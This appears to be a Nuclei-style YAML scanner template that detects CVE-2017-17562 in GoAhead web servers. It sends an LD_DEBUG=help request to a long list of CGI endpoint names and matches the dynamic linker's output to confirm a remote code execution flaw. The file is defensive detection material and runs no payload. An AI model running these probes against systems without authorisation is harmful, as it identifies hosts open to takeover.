111 lines
2.4 KiB
YAML
111 lines
2.4 KiB
YAML
id: CVE-2017-17562
|
|
|
|
info:
|
|
name: Embedthis GoAhead <3.6.5 - Remote Code Execution
|
|
author: geeknik
|
|
severity: high
|
|
description: |
|
|
description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
|
|
reference:
|
|
- https://www.elttam.com/blog/goahead/
|
|
- https://github.com/ivanitlearning/CVE-2017-17562
|
|
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
|
|
- https://github.com/embedthis/goahead/issues/249
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-17562
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.1
|
|
cve-id: CVE-2017-17562
|
|
cwe-id: CWE-20
|
|
tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
|
|
payloads:
|
|
endpoint:
|
|
- admin
|
|
- apply
|
|
- non-CA-rev
|
|
- cgitest
|
|
- checkCookie
|
|
- check_user
|
|
- chn/liveView
|
|
- cht/liveView
|
|
- cnswebserver
|
|
- config
|
|
- configure/set_link_neg
|
|
- configure/swports_adjust
|
|
- eng/liveView
|
|
- firmware
|
|
- getCheckCode
|
|
- get_status
|
|
- getmac
|
|
- getparam
|
|
- guest/Login
|
|
- home
|
|
- htmlmgr
|
|
- index
|
|
- index/login
|
|
- jscript
|
|
- kvm
|
|
- liveView
|
|
- login
|
|
- login.asp
|
|
- login/login
|
|
- login/login-page
|
|
- login_mgr
|
|
- luci
|
|
- main
|
|
- main-cgi
|
|
- manage/login
|
|
- menu
|
|
- mlogin
|
|
- netbinary
|
|
- nobody/Captcha
|
|
- nobody/VerifyCode
|
|
- normal_userLogin
|
|
- otgw
|
|
- page
|
|
- rulectl
|
|
- service
|
|
- set_new_config
|
|
- sl_webviewer
|
|
- ssi
|
|
- status
|
|
- sysconf
|
|
- systemutil
|
|
- t/out
|
|
- top
|
|
- unauth
|
|
- upload
|
|
- variable
|
|
- wanstatu
|
|
- webcm
|
|
- webmain
|
|
- webproc
|
|
- webscr
|
|
- webviewLogin
|
|
- webviewLogin_m64
|
|
- webviewer
|
|
- welcome
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
words:
|
|
- "environment variable"
|
|
- "display library search paths"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# Enhanced by mp on 2022/06/19
|